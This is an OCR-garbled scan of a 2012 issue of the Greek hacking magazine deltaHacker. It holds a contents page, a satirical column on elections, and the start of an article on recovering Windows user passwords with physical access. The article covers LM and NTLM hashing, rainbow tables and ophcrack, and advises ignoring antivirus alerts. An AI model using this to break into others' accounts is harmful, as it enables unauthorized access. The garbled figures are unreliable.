д г) 


τούλης 2012 # τιµή τεύχους 6,40€. 


T ome deu 


Συμμετέχετε ενεργά στο δίκτυο Тог. 
Πάρτε όλα τα δεδοµένα, όλων TOV iPhone 
Αποκαλύψτετα passwords тоу Windows users 
Δείτε εξύπνες & αποτελεσματικές επιθέσεις DOS 


..ΕΝΤσόου ματς Hop! 


[3] Αλλά για φέτος δεν υπάρχει καμία δικαιολογία: Το deltaHacker εἶν' εδώ και οι διακοπές 
σας δεν θα αποτελούνται “μόνο” απ' όλες αυτές τις βαρετές ασχολίες µε τις παραλίες, 
το τσουρούφλισµα και та ποτά στα beach bars :) 


ПРА 


εντιτὀριαλ 


η καλύτερη δουλειά του κόσμου! 


σνέιλ μέιλ 


Q o 


υπάρχει συσχέτιση µεταξύ ψεκασμών κι 
αβγοκεφάλων; ο Θείος Ακάκιος αναρωτιέται... 


Ta passwords των Windows, 
αλλά στη φόρα! 


νομίζετε ότι το A4j2fhk9sdbo2gy 
εἶναι ισχυρό password; 


Python Game Programming: 
Ready, set, fire! 


starry backgrounds, ομαλές κινήσεις διαστηµο- 
πλοίων και laser που σέβονται τους νόμους των 
σωστών space shooters 


Ασκήσεις απομακρυσμένης 
πρόσβασης 


...фор Φαν εντ πρόφιτ φυσικά 


АП your iPhones are belong to us! 


δεν ἔχει καμία σημασία η έκδοση rou iOS, 
ούτε TO αν έχετε κάνει jailbreak ή ὄχι 


^ Μπείτε στο κύκλωμα, ενεργά! 


βοηθήστε κι εσεῖς στην ανάπτυξη rou 
hidden web -- µπορείτε! 


ομάδα WHITE: 
DDoS yia το δικὀ σας καλό! 


αυτή τη φορά, o πράκτορας που εργάζεται 
για την ομάδα WHITE βρέθηκε σε πραγματικά 
δύσκολη θέση... 


Επικίνδυνες διασυνδέσεις, 
αλλά συμβολικά! 


όλα εἶναι θέµα τάιµινγκ 


90 Βάλτε роало στον ανεμιστήρα 


парт ουἀν 


αυτό то USB gadget που παίρνει μόνο ρεύμα από το 
USB; е, αυτό. 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Ανδρέας 


Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Γιῶργος Μελέκος, Νίκος Μουρατίδης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Τόμπρας 


Γραμματικἠ επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το περιοδικὀ deltaHacker εἶναι συνδρομητικό και εκδίδεται anó την Parabing Creations 
δώδεκα φορὲς το χρόνο, κάθε μήνα. Н Parabing Creations έχει την έδρα της στη Μαιώτιδος. 
3, 55 133, Καλαμαριά. Η εκτύπωση και η βιβλιοδεσία γίνονται απὀ την ThessPrint Α.Ε. To 
email επικοινωνίας του περιοδικού εἶναι το talk2usQdeltahacker.gr ка! ro email για τις 
συνδρομές ro subscriptionsGdeltahacker.gr. Οι πληροφορἱες για τις συνδρομὲς εἶναι στο 
http://deltahacker.gr/subscriptions και οι παραγγελἰες γίνονται anó ro http://deltahacker. 
gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφράζουν απαραίτητα ка! τη 
γνώμη του περιοδικού. 


(5) απευθείας πτήσεις ATH-KEF τώρα! 
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Topics Posts Freshness 


10 130 


Συζητήσεις και κουβέντες περί ανέμων και υδάτων. Καθώς, 
περνά o χρόνος, να Beire που θα κάνει δειλά δειλά την 41 196 
εμφάνισή της n αυτοοργάνωση και τελικά θ' αναδυθεί 


περιοδικό ~ forums ~  /var/log/messages /dev/random addenda Ыр ins3cure canned streams 


Σύνδεση 


Όνομα χρήστη: 
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Να ре θυμάσαι 
Σύνδεση» 


Εγγραφή 


Χάσατε το. 


35 163 
Προβλήματα, προκλήσεις, σπαζοκεφαλιές, ιδέες και 
λύσεις γύρω από διάιρορα ζητήματα που αφορούν στο 
software, στα δίκτυα καθώς και στην κοινωνική μηχανική, 
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9 ακόλουθο Screencast, : 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Ta εβδομαδιαία µας 
video casts [έρχονται, έρχονται]. Ολόκληρα blasts from the past. 
Та βίντεο από та live streams. Ta πάντα ενδιαφέροντα forums. To 
σημεῖο συνάντησης για τους φίλους του περιοδικού. Н πιο ζωντανή 
κοινότητα και οι πιο ανήσυχοι, δημιουργικοῖ χρήστες! 
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Αγαπητοί µου, 

Έχω κάτσεν στο τραπέζι του σαλονιού, σήμερα Κυριακή πρωΐ, πρατώντας 
μολύβν παν χαρτί (δηλαδή χαρτί και γραφομη ανή) καν προσπαθώ να σκεφτώ 
τν να σας γράφω. “8 

Να πω την αλήθεια, δεν είναν бт, προσπαθώ να σκεφτώ τι θα γράφω, ξέρω 
πολύ καλά τν θέλω να γράφω, αλλά προσπαθώ να δω μήπως μπορέσω να то 
αποφύγω, γνατί θα µε πιάσεν πάλιν στο μπούρου μπούρον о Κύριος Επδότης 
καν δεν έχω όρεξη, χροννάρες μέρες. 

Αφήστε που σήμερα έχω τα νεύρα рох. Όλα µου πάνε στραβά. Όχν µόνο 
σήµερα, ολόκληρη η περασμένη βδομάδα, µετά τις εκλογές συγκεκριµένα, 
κακή στραβή καν ανάποδη ήταν. Απλά σήμερα το πράγμα έχει παραγίνεν. 

Κατ' αρχάς δεν µου éxev έρθει ακόµα το τεύχος. Ενώ µου το έχουν otel- 
λεν. То ξέρω γιατί είδα τις ντάνες στο φέισμπου», καθ' οδόν προς ταχυ- 
δρομείο. 

Πήγανε στο ταχυδρομείο καν έμειναν εκεί. 

Ναι, εντάξεν, ξέρω, θα μου πείτε ον εκλογές. Мод, πρέπει να µιλήσεν ο 
σοφός λαός, να εκφραστεί, η αναστάτωση εἶναι µέσα στο παιχνίδι, άλλον 
πάνε στα χωριά τους να Φηφίσουν, ον δουλειές πάνε σε δεύτερη μοίρα, γιατί 
απορώ; 

Για καθίστε ρε παιδιά, για μισό, να το σκεφτούμε σοβαρά δηλαδή, γνατί 
Ov επλογές θα πρέπει να συνεπάγονται от, σταματάνε να λειτουργούν τα 
ταχνδρομεία; 

Καν ὀχν µόνο τα ταχνδρομεία, =; Να λέμε τα πράγματα µε то ὀνομά 
τους. Εδώ και δυόμιση μήνες που είπαμε бт, θα κάνουμε εκλογές έχουν 
σταματήσει τα πάντα. Πείτε μου εσείς κάτι που να λειτουργεί. Που να λει- 
τουργεί πραγματικά, εννοώ, ὀχν εν συνηθείας, 

θα µου πείτε τώρα ον καιροί είναι πονηροί, εδώ δεν ξέρουμε πού θα ci- 
μαστε μεθαύριο και µε τν νόµισµα, το ταχυδρομείο µε µάρανε; Παίζεται το 
μέλλον της χώρας καν της ευρωζώνης, XL εγώ παραπονιέµαν που µου καθυ- 
στέρησαν το τεύχος; 

Κοτζάμ Ομπάμα, σου λέεν ο άλλος, καν κάθε απόγευμα είναν καρφωμένος 
στο ίντερνετ καν βλέπει Μέγκα και ЕРТЕ (sic), µε τους μεταφραστές του 
оло δίπλα, προσπαθώντας να καταλάβει αν θέλουµε πραγματικά. να είμαστε 
στο ευρώ ἡ ὀχν. 

Αυτό δεν το βγάζω απὀ το росло μον, το μεταφέρω έτσι όπως µου το 
είπε ο хориос Μανόλης алб την ЕВГА, απέναντι. 

«Τα συμφέροντα είναν μεγάλα, φίλε μον, ξύπνα!» μου είπε στο τέλος. 
«Δημοσιογράφος άνθρωπος καν δεν ξέρεις τα βασικά.» 


Πριν τις εκλογές αυτό. 
Γνατί µετά τις εκλογές υποθέτω ότι τα βασικά τα μάθαμε, έτσι; 
Μάθαμε ας πούμε ότι υπάρχουν στην χώρα µας 425,982 Έλληνες πολίτες 


Σνέιλ μέιλ 
ИИ, 


µε δικαίωµα ᾠήφον ov οποίον αντί να κάνουν ὁ,τι τόσες καν τόσες άλλες 
χιλιάδες Έλληνες πολίτες ηµέρα εκλογών Ιούνη µήνα -να πάνε ας πούμε για 
μπάνιο ў γνα καφέ-, πήγαν και στήθηκαν στην ουρά για να Φηφίσουν µια 
συμμορία ανεγκέφαλων φανατικών που θεωρούν ότν ο Χίτλερ ήταν καλό παι- 
δί αλλά παρεξηγημένο, καν περνάνε την ώρα τους µαχαιρώνοντας μελαμφούς 
κακομοίρηδες στο μετρό, µε τους αστυνομικούς καν τους σεκιουριτάδες να 
παρακολουθούν αμέτοχοι καν διακρντικοί ало δίπλα. Λες καν βρίσκονταν 
EXEL απεσταλμένου ως παρατηρητές του ОНЕ. 

Ῥόρρυ παιδιά, σας το είπα, έχω νεύρα σήμερα. Tnv περασμένη φορά ει- 
ρωνενόμουν τα Χρυσά Αβγά (ТМ) παν την αβγοσύνη τους, γιατί πίστενα, ο 
αφελής, ὀτν εκείνο το 7% που πήραν τον Μάνο ήταν ένδειξη ενήθενας. Χαζο- 
μάρας, αφέλειας, βλακείας, πώς το λένε. Ότι ο Κόσμος δεν είχε καταλάβεν 
περί τίνος πρὀκειταιν. Ότι ήταν ᾠήφος «διαμαρτυρίας». 

ΟΚ. Αυτά τότε. Πριν έναν µήνα. Τώρα δηλαδή τι πρέπει να πιστέφω; Τώρα 
που o κόσμος κατάλαβε, έγινε κάτι} Άλλαξε κάτι; 

E μήπως ακόµα δεν έχεν μάθει και δεν έχεν καταλάβει (ο κόσμος); Μήπως 
δεν είδε το γνουτνούμπ µε την ομάδα των φουσκωτών να κυνηγάνε τον ka= 
κομοίρη στις σκάλες Ύνα να τον μαχαιρώσουν; Μήπως δεν είδε τον σεκιουρι- 
τά να κοντάει τρυφερά; Δηλαδή τν να κάνω, να βάλω το URL; Αντό πρέπει; H 
πληροφόρηση µας λείπει Гис. όνομα. 

Βέρετε, η δικαιολογία για το ακαταλόγιστο έχει καν κάποιο όριο. 


Καιρός να δούμε το ζήτημα ως éxev, αγαπητοί μον. Φέτος τον Τούννο 
425,982 Έλληνες Πολίτες παραδέχτηκαν µε την φήφο τους ότι επυκροτούν, 
γουστάρουν, τη βρίσκουν, βρε αδερφέ, µε τραμπουμισμούς xav μαχαιρώμα- 
τα. Тоу Μάιο o αριθµός τους ἧταν 221,018. Μιλάμε δηλαδή γνα πάνω από 
τετρακόσιες χιλιάδες που είναι συνενδητοποιηµένοι. 
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Απροσδιόριστος αριθµός άλλων δεν έχεν ακόµα τολμήσει να TO παραδε- 
χτεί. Ντρέπονταν, сис. 

Βρείτε µου τώρα εσείς έναν λόγο να µην έχω νεύρα. Н έστω βρείτε µου 
κάτι άλλο να σας γράφω. ОК, να σας γράφω για το άνοιγμα των top level 
domain στο ίντερνετ. H για το ότι о Ασάνζ (των wiklleaks) κατέφυγε 
στην πρεσβεία του Εκοναδόρ ζητώντας άσυλο. Н για το ότι η µετοχή του 
Facebook πηγαίνεν алб το нано στο χειρότερο, σε σηµείο μάλιστα που 
κάποιοι σκέφτονται να κινηθούν και δικαστικά εναντίον της εταιρείας για 
χειραγώγηση της πληροφόρησης κατά τις εβδομάδες πριν την εισαγωγή της 
μετοχής στο χρηματιστήριο. Н от, η Microsoft θα βγάλει δικό της iPad. 

Ῥνγά µην σας γράφω για τέτοια. Гу αὐτό έµεινα σπίτι καν δεν πατέβηκα 
στο Φάληρο µε την εξαδέλφη παν τη μητέρα της, που civar Ινδουίστριαχ Για 
να σας γράφω για χρηματιστήρια καν domain name; Αυτά τα γράφουν καν 
άλλον, καν μάλιστα καλύτερα από μένα. 

Εγώ το μόνο για то οποίο μπορώ να σας γράφω, αγαπητοί µου, civar 
αυτό πον µε ανησυχεί καν µε τρομάζει. 

Tv µε τρομάζεν, µε τροµοµμρατεί. 

Γιατί δεν εἶναι µόνο ον αβγοχκέφαλοιν. 


Μεγάλος αριθµός Ελλήνων Πολιτών, λέεν, πιστεύουν πραγματικά ότι περ- 
νάνε αεροπλάνα καν µας Φεκάζουν. Χιλιάδες, ίσως δεκάδες ἡ και επατοντά- 
δες χιλιάδες τέτοιον. Πάνε καν αυτοί και Φηφίζουν. 

Δεν ξέρω τν Φηφίζουν, αλλά ήμαρτον. 

Τώρα πείτε µου, άνθρωπον των γραμμάτων, είστε, και των αριθμών. 
Πιστεύετε δηλαδή πραγματυκά оть τα φαυνόμενα αυτά, η ύπαρξη φεκα- 
σµένων καν η ὕπαρξη αβγοκέφαλων, δεν σχετίζονται; Σύμπτωσις; False 
connection; 

Nav, ναν, ξέρω алб στατιστική, τα θυµάμαν αυτά, µας το έλεγε και 
ξανάλεγε o δάσκαλος στο δημοτικό (άλλες εποχές τότε, δύσκολες): 
correlation is not causation, το бт, σχετίζονται δεν σηµαίνεν бт, συν- 
δέονται καν αντιακά. Σύμφωνον, αλλά εγώ δεν νσχυρίστηκα κάτι τέτοιο. Δεν 
υποστηρίζω, δηλαδή, ότν τα χρυσά αβγά δημιουργούν φεκασμµένους ў ότι ον 
Φεκασμένον δημιουργούν χρυσά αβγά ἡ ότι τα χρυσά αβγά είναι καν φεκα- 
σμένον, 

(Ау και τώρα που το ξανασχέφτομαι...) 

To µόνο που λέω είναν оть φεκασμένοιν και χρυσά αβγά είναι συμπτώμα- 
τα της ἴδιας ασθένειας. Και ναι, πρόκενταν Yla ασθένεια, σόρρυ. Δεν θα το 
παίξω τώρα πολιτικώς ορθός γνα να µην τσαντιστεί ο κάθε αφασικός τρα- 
μπούκος που µαχαιρώνεν εξαθλιωµένους πακιστανούς στο όνομα της Αρχαίας 
Ἑλλάδας καν του Φύρερ. Σόρρυ. Έχω ни εγώ τα ὁριά μου. 

Καν σαν να µην µας φτάνανε ον µαχαιροβγάλτες µε το ασταθές росло, 
Φάχνω στο ίντερνετ (στον φορητό της ξαδέλφης) να βρω για τους φεχα- 
σμούς, καν διαβάζω το παρακάτω: 

«О ανθρώπινος οργανισµός είναι στην ουσία ηλεκτρόνια που πάλλονταν 
αδιάκοπα καν συναισθήματα τα οποία τροφοδοτούνται ало χημικές αντι- 
δράσεις και μεταφέρονται µέσα στο σώμα και τον εγκέφαλο µέσω ηλεχτρυ- 
κών σημάτων διαμέσου των νεύρων.» 

Σόρρν, δεν μπορώ να κάνω τίποτα. EXEL σταματήσει καν η πίστωση στα 
φαρμακεία, αλλιώς ξέρω τι χρειάζεται: 


Ολανζαπίνη. 


Σας ασπάζομαν 
θείος Ακάκνος 


Εσείς τι δικαιολογία έχετε που η διαφήμισή σας απουσιάζει από εδώ; 


Τολμήστε va µας την neite από το talk2usQdeltahacker.gr. Όπως και να "χει θα 
επικοινωνήσουμε κι εμείς µαζί σας - ή έστω µε τον ανταγωνιστή σας ;) 
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Δεν υπάρχει τίποτε χειρότερο yia £vav χρήστη 
anó το να διαρρεύσει το password του. 
Εντάξει, ἴσως υπάρχουν éva δυο πραγματάκια 
χειρότερα απ’ αυτό, αλλά ὁπως και va ‘ХЕ! το 
να πέσει το password σου στα χέρια τρίτων 
εἶναι σίγουρα πολύ πολύ како -- και ειδικἁ av 
δεν το χεις πάρει καν εἴδηση :5 
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Σ’ αυτὀ το ἆρθρο θα δείξουμε, αναλυτικἁ και βήμα προς βήμα, пос ἑνας 
attacker µε φυσικἠ πρὀσβαση о’ ἑνα Windows-based РС µπορεί να μάθει 
τα passwords των user accounts του λειτουργικού µέσα σ’ ελάχιστο χρό- 
νο, μάλιστα χωρὶς να κοπιάσει ιδιαίτερα. Κι επειδἠ προσωπικἀ µας αρέσει 
να γνωρίζουμε пос δουλεύουν (και γιατὶ μερικὲς φορὲς δεν δουλεύουν) 
τα πράγματα γύρω рас, πριν περάσουμε στις επιδείξεις θα συζητήσουμε 
για το πώς та Windows δημιουργούν και διαχειρίζονται τα passwords των 
χρηστών. 


Τα πολύ апараітпта hashes 


Пос θυμάται ἑνα λειτουργικὀ σύστημα τους κωδικούς πρόσβασης των 
χρηστών yia τους αντίστοιχους λογαριασμούς; Προφανώς κάπου τους 
ἐχει αποθηκευµένους, WOTE ὅταν π.χ. εγὠ κάνω login στο σύστημα και 
δίνω το password µου, va 'vai σε θέση να ελέγξει αν πράγματι πληκτρο- 
λόγησα το σωστό password. 


Το σηµαντικό εδὠ εἶναι от! όλα τα σύγχρονα λειτουργικά συστήµατα ano- 
θηκεύουν ra passwords σε κρυπτογραφημένη μορφὴ κι όχι ως plaintext, 
ὁπως λέγεται στα плаіста της κρυπτογραφἰας ἑνα οποιοδήποτε μήνυμα 
nou ἜδενἨ εἶναι κρυπτογραφημένο. О λόγος nou το κάνουν αυτὸ αφορά 
στην ασφἀλεια, φυσικά: Αν ἑνας επιτιθἐµενος αποκτἠσει µε κἀποιον тро- 
πο πρόσβαση στο σύστημα, δεν υπάρχει κανένας λόγος va του κάνουμε 
τη ζωή εὐκολη προσφἑροντάς του ra passwords *óAov* των χρηστών 
στο πιάτο! 


Ὅπως ола ra λειτουργικἁ συστήματα, λοιπὀν, ἐτσι και та Windows 
avri για plaintext passwords αποθηκεύουν τα λεγόμενα hashes τους. 
To hash εἶναι το αποτέλεσμα µιας криптоурафикйс συνάρτησης hash 
(cryptographic hash function), η οποία παίρνει ἑνα οσοδήποτε µεγάλο 
ἡ ыкро μήνυμα και µε βάση αυτό παράγει µια συμβολοσειρά (string) 
σταθερού μήκους. Προφανώς, όλες οι συναρτήσεις hash δεν εἶναι ἴδιες. 
Υπάρχουν, δηλαδὴ, πολλοὶ διαφορετικοί τρόποι για να µετατρέψεις ἑνα 
plaintext σε hash. Όλες ὀμως οι (ισχυρέἑς) συναρτήσεις hash μοιράζονται 
δυο ιδιότητες. 


Й 


а. Εἶναι ευαίσθητες ως προς την εἰσοδο. Έστω ка! ката ёха bit v 
αλλάξει το μήνυμα που δίνουμε σε µια συνάρτηση hash, то string 
που µας επιστρέφει εἶναι ριζικἁ διαφορετικὀ σε σχἐση µε το npon- 
γούμενο (πριν αλλάξει αυτὸ то bit, δηλαδὴ). 


В. Εἰναι δύσκολο va αντιστραφούν. Αυτό σημαίνει от! παίρνοντας Kå- 
ΠΟΙΟ hash ка! µε δεδομένο ὁτι γνωρίζουμε ποια κρυπτογραφικἠ 
συνάρτηση hash το παρήγαγε, δεν σημαίνει ὁτι εἶναι κι εὐκολο va 
βρούμε το αρχικό μήνυμα που δόθηκε στη συνάρτηση. Προσέξτε: 
Δεν εἶναι αδύνατο, απλά εξαιρετικά δύσκολο, σε βαθμό nou να 
μην αξίζει καν va το ψάξουμε. Εκτὸς βέβαια κι αν ακολουθήσουμε 
“πλάγιες” μεθόδους, опос θα δούμε παρακάτω. 


Εἶναι δυνατὸν να δώσουμε δύο διαφορετικἀ μηνύματα στην ἴδια συνάρ- 
τηση hash και να πάρουμε то ἴδιο αποτέλεσμα. Μ΄ àAAa λόγια, η πιθανὀ- 
τητα για τις λεγόμενες συγκρούσεις (collisions) δεν εἶναι μηδέν. Όπως θα 
ἐλεγε κι ἑνας μαθηματικός, οι συναρτήσεις hash δεν εἶναι “Ема προς ёа”. 
Αν ἦταν, τότε για συγκρούσεις δεν θα συζητούσαμε γιατὶ поло апла δεν 
θα συνέβαιναν ποτὲ. Πάντως το ευτύχημα µε ra collisions, τουλάχιστον 
για τις καλὲς συναρτήσεις hash, εἶναι η εξαιρετικά χαµηλἠ --αστρονομικά 
χαμηλἠ, θα λἐγαμε-- πιθανότητα εκδἠλωσής τους. 


Та passwords των Windows, αλλά στη φόρα 


ИИ 


Windows XP [Running] 


»-installer-3.4,0.exe dowload 
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псе Software 


Your орпсгаск download will start in 0 seconds.. 
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Register LogIn 
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AVG Identity Protection 


O 


Threat detected 


1DP.Adware.31185001 
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Adware/Spyware 
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without user permission or notice on a 
and different from the application installed 


У» Move to Vault (Recommended) 
Will safely quarantine the Infected file to Virus Vault until further decision. 


№ Allow 


Will leave the file as it is now. 


C:\Documents and Settings|subZraw|Local Settings| Temp| YbsStvXL.exe.part. 


This is a potentially unwanted application. These are programs that computer 
wish to be made aware of. These programs include applications that 
have an impact on securty, privacy, resource consumption, or are associated 
with other security risks. These programs can show a pattem of instalation 
system or be deemed to be separate 


Ὁ 2012 Geeknet, Inc. 


Windows 7 (2012-07-04) [Running] 


Ката την εγκατάσταση rou ophcrack σε Windows XP rj Vista/7, το поо antivirus πιθανώς да опиа- 
νει συναγερμὀ. Ένας λὀγος εἶναι o εντοπισμός rou εργαλείου fgdump, το οποίο χρησιμοποιείται για την 
αντιγραφή των hashes rou SAM file. Προφανώς, τον συναγερμὀ τον αγνοούμε ка! στο antivirus λέμε va 


δημιουργήσει µια εξαίρεση, επιτρέποντας кат’ αυτόν τον τρόπο την орал) εγκατάσταση rou ophcrack. 
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Ta Windows, Aoinóv, ra passwords των χρηστών δεν τα αποθηκεύουν 
πουθενά ως plaintext. Αντίθετα, αποθηκεύουν ra hashes τους ка! μόνον 
αυτά. Έτσι, όταν επιχειρούµε login στο σύστημα, αφού πληκτρολογήσου- 
НЕ TO password το λειτουργικὀ υπολογίζει то hash του ка! το συγκρίνει 
р’ αυτό που ἐχει αποθηκευμένο yia το αντίστοιχο username. Αν τα δύο 
hashes εἶναι ἴδια τότε µας αφήνει va συνδεθούμε, αλλιώς ὀχι. Μόνη nepi- 
πτωση να συνδεθούμε σε κἀποιον λογαριασμὀ *xopic* να γνωρίζουμε то 
password του αντίστοιχου χρήστη, εἶναι να τύχουµε στην απίθανη nepi- 
πτωση του collision. Να δώσουμε, δηλαδὴ, éva password που боооолос̧ 
τυχαίως ἐχει ἰδιο hash р’ εκεἰνο που γνωρίζουν τα Widnows! 


Γκουντ Лак уош@ дат. 


Та hashes στα Windows ΧΡ 


To λεγόμενο LM hash ἡ LanMan ἡ LAN Manager hash, εἶναι η криптоура- 
φικἠ συνάρτηση hash που χρησιμοποιούταν στα Windows *npiv* апо την 
ἐκδοση NT. Λίγα праурата εἶναι πιο παλιὰ апо ra Windows ΝΤ, ωστόσο 
για λόγους συμβατότητας ro LM hash χρησιμοποιείται και σε νεότερες εκ- 
δόσεις των Windows, συγκεκριµένα έως και ra XP. Апо ra Vista κι ἐπειτα 
τα Widnows συνεχίζουν να γνωρίζουν то LM hash, εξ ορισμού ὁμως то 
xouv απενεργοποιημένο. 


To σηµαντικὀ εδώ εἶναι от! το LM hash χρησιμοποιείται ακόµη και σήμε- 
ρα στα Windows ΧΡ, καθώς και от! о! εγκαταστάσεις της συγκεκριμένης 
ἐκδοσης των Windows συναντώνται τόσο σε εταιρικἁ περιβάλλοντα, обо 
και σε οικιακά. 


To LM hash κάποτε ἧταν επαρκέστατο апо κρυπτογραφικἠς σκοπιάς. 
Εξαιτίας της ραγδαίας εξέλιξης των επεξεργαστών αλλά και της πτώσης 
του κόστους αποθήκευσης, σήμερα δεν εἶναι. Ας δούμε όμως пос τα 
Windows ΧΡ παράγουν та hashes των κωδικών. 


ο Αν το μῆκος του password εἶναι πάνω апо 14 χαρακτήρες τότε 
*Ogv* υπολογίζεται LM hash κι avri αυτού υπολογίζεται το ката 
πολὺ ισχυρότερο NTLM hash (βλ. συνέχεια). 

ο Πεζά γράμματα στο password μετατρέπονται σε κεφαλαία. Έτσι, 
η εἰσοδος της συνάρτησης LM αποτελείται πάντα апо κεφαλαία, 
αριθμούς και σύμβολα. 

ο Αν το μήκος του password εἶναι κάτω апо 14 χαρακτήρες, τότε 
προστίθενται ὁσοι «κενοί» χαρακτήρες (null characters) χρειάζο- 
νται, ὥστε το μήκος του να εἶναι *akpiBoc* 14 χαρακτήρες. 

e Н συμβολοσειρἁ 14 χαρακτήρων χωρίζεται στη μέση και πλέον 
έχουμε δύο, καθεμιὰ µε μήκος 7 χαρακτήρες ἡ αλλιώς 7 bytes. 

e Καθένα απὀ τα δυο αυτά 7-byte strings μετατρέπεται σ΄ èva bit 
stream, δηλαδή σε ма ακολουθία апо bits. Αναλυτικότερα, κάθε 
byte μετατρέπεται στο δυαδικὀ αντἱστοιχὀ του στον πίνακα ASCII, 
επομένως για кабЕ 7-byte string παίρνουμε ἑνα bit stream μήκους 
7х8 = 56 (1 byte = 8 bits). Μετά anó κάθε =птаба bits εισάγεται 
£va μηδενικὀ, ара т=Лка για καθένα апо τα δύο μισά του password 
ἔχουμε µια ακολουθία апо 56 + 8 = 64 bits. 

ο Καθένα anó ra δύο αυτά bit stream µήκους 64 bit, χρησιμεύει 
yia την παραγωγἠ ενὸς κλειδιού DES (Data Encryption Standard, 
http://en.wikipedia.org/wiki/Data Encryption Standard). Σ’ αυτό 
το σημείο λοιπὸν έχουμε δύο DES keys, ενδεχομένως διαφορετικἁ 
αλλὰ ὀχι κατ’ ανάγκη. 


Та passwords των Windows, αλλά στη φόρα! 
ГХК 


Windows 7 (2012-07-04) [Running] 
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Г use τ [tM nesh NT Hash — Γώρκαι | tMPwd2 | nrw | 
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9 tabl... 100% in RAM 
ә tabl... 100% in RAM 
9 tabl... 100% in RAM 


Progress 
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Preload:| ^ waiting | Brute force: | done 
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e Καθένα апо та δύο κλειδιά DES χρησιμεύει yia την κρυπτογράφη- 
ση του string «KGS!@#$%» (χωρίς τα εισαγωγικά). 

e Προκύπτουν ἐτσι δύο ciphertexts --έτσι ονομάζονται о! κρυπτο- 
γραφημένες εκδοχὲς των plaintexts--, τα οποία μπαίνουν το ἑνα 
δίπλα στο ἆλλο για να δημιουργήσουν ёха string μήκους 16 bytes: 
Αυτὀ εἶναι το LM hash του αρχικού password! 


Αδυναμἱίες Tou LM hash 


Апо τον nivaka ASCII nou υπάρχει oro www.asciitable.com ка! σε каша 
129 χιλιάδες ἀλλα µέρη ото web, βλέπουμε от! υπάρχουν 95 στο πλήθος 
printable characters που μπορούν να χρησιμοποιηθούν σ’ ἑνα password 
(ξεκινάμε апо τον ASCII 32, που εἶναι το κενὀ, και μετράμε ἑως τον 
ASCII 126, που εἰναι то ~). 


Па strings μήκους 14 χαρακτήρων, λοιπὀν, έχουμε 95^14 ἡ περίπου 2392 
δυνατούς συνδυασμούς, ónoc βρίσκουμε αν πάρουμε τον δυαδικὀ λογά- 
ριθµο του 95^14. Το θέμα όμως εἰναι ὁτι το LM hash γυρνάει τους πεζούς 
χαρακτήρες σε κεφαλαἰους, επομένως avri yia 95 χρησιμοποιήσιμους 
χαρακτήρες практика ἐχουμε 95 - 26 = 69. Έτσι, аут! για 95/14 συνδυα- 
σμούὺς στην πραγματικότητα έχουμε 69^14 ἡ περίπου 2^86. Апо το 2386 
wG το 2792 εἶναι πολύ μεγάλη η απὀσταση, όμως то ἐργο ενός επἰδοξου 
brute forcer εἶναι ακόμα πιο εὐκολο! Πράγματι, εξαιτίας του τρόπου µε 
τον οποίο δουλεύει το LM hash, o attacker δεν επικεντρώνεται πάνω о" 
ἑνα 14-byte string αλλά πάνω σε δύο 7-byte strings, και για καθένα εξ’ 
αυτών υπάρχουν 69^7 ἡ περίπου 2/43 συνδυασμοί. 


Ема! πολύ πιο οικονομικὀ апо ἄποψης χρόνου να γίνουν δύο επιθέσεις 
brute force, καθεμία για τον εντοπισμὸὀ ενὸς string µε ciphertext апо 
ἑνα σύνολο 2743 στοιχείων, пара να γίνει uia επίθεση brute force για 
την εὑρεση ενὸς string µε ciphertext апо ¿va σύνολο 2^92 ἡ ἑστω 2786 
στοιχείων. 


Тора, µια επίθεση brute force που στη χειρότερη περίπτωση oAokAnpo- 
νεται μετὰ апо 2/43 δοκιμές, εξακολουθεὶ να χρειάζεται apkeró χρόνο 
отау για κάθε δυνατὸ string πρέπει а) να παραχθεἰ το αντίστοιχο κλει- 
9! κρυπτογράφησης, В) μετά va υπολογιστεὶ ἑνα ciphertext ка! y) να 
συγκριθεἰ το ciphertext u’ auró που ἠδη γνωρίζουμε. Χρειάζεται ὁμως 
πολύ λιγότερο χρόνο ὁταν διαθέτουμε *rón* vav мака µε ола τα 
ciphertexts, για κάθε (ἡ σχεδὀν για κἀθε) 7-byte string! Τέτοιοι πίνακες 
προ-υπολογισμένων ciphertexts ονομάζονται rainbow tables και, ὁπως 
υποψιάζεστε, rainbow tables που προέρχονται апо διάφορα σύνολα χα- 
ρακτήρων υπάρχουν ἠδη και χρησιμοποιούνται για то “σπάσιμο” των LM 
hashes, и’ ἄλλα λόγια yia την αντιστροφή τους (την εὑρεση, δηλαδή, των 
αντἰστοιχων κωδικών σε μορφὴ plaintext). 


Еау ro LanMan ενέπλεκε την τεχνική του salting ката τη δημιουργία 
των hashes (βλ. και επόμενη ενότητα), η κατασκευἠ rainbow tables για 
την αντιστροφὴ τους θα ἦταν αδύνατη. To LanMan όμως δεν ασχολείται 
НЕ salting. Ομοίως κι ο διάδοχός του, το NTLM, nou χρησιμοποιείται στα 
Windows 7. 


Ta hashes στα Windows 7 


Σε σύγκριση µε ra LM hashes, εκεἰνα των Windows 7 δημιουργούνται 
εφαρμόζοντας µια απλούστερη διαδικασία αλλά ταυτόχρονα εἶναι πολύ 
nio ισχυρά. Ονομάζονται NTLMv2 hashes ἡ απλά ΝΤ hashes και η na- 
ραγωγἠ τους στηρἰζεται στην κρυπτογραφικἠ συνάρτηση MD4 (http:// 
en.wikipedia.org/wiki/Md4). Ta NT hashes κατασκευάζονται anó κωδι- 


Ta passwords των Windows, αλλά στη φόρα! 
WT 
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Επιτυχία yia то ophcrack, ro οποίο kai στις δύο περιπτώσεις στόχευε τον χρήστη subZraw ενὀς Windows 7 
box. Παρατηρήστε от! ΟΙ κωδικοί που κατάφερε va εντοπίσει δεν ἦταν καθόλου πολύπλοκο)... 
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KOÜG οι οποίοι επιτρέπεται va ἐχουν περισσότερους апо 14 χαρακτήρες, 
ενώ υφίσταται και διάκριση μεταξύ πεζών και κεφαλαἰων. Enionc, τα ΝΤ 
hashes δεν προέρχονται anó τον χωρισμό του plaintext σε μικρότερα 
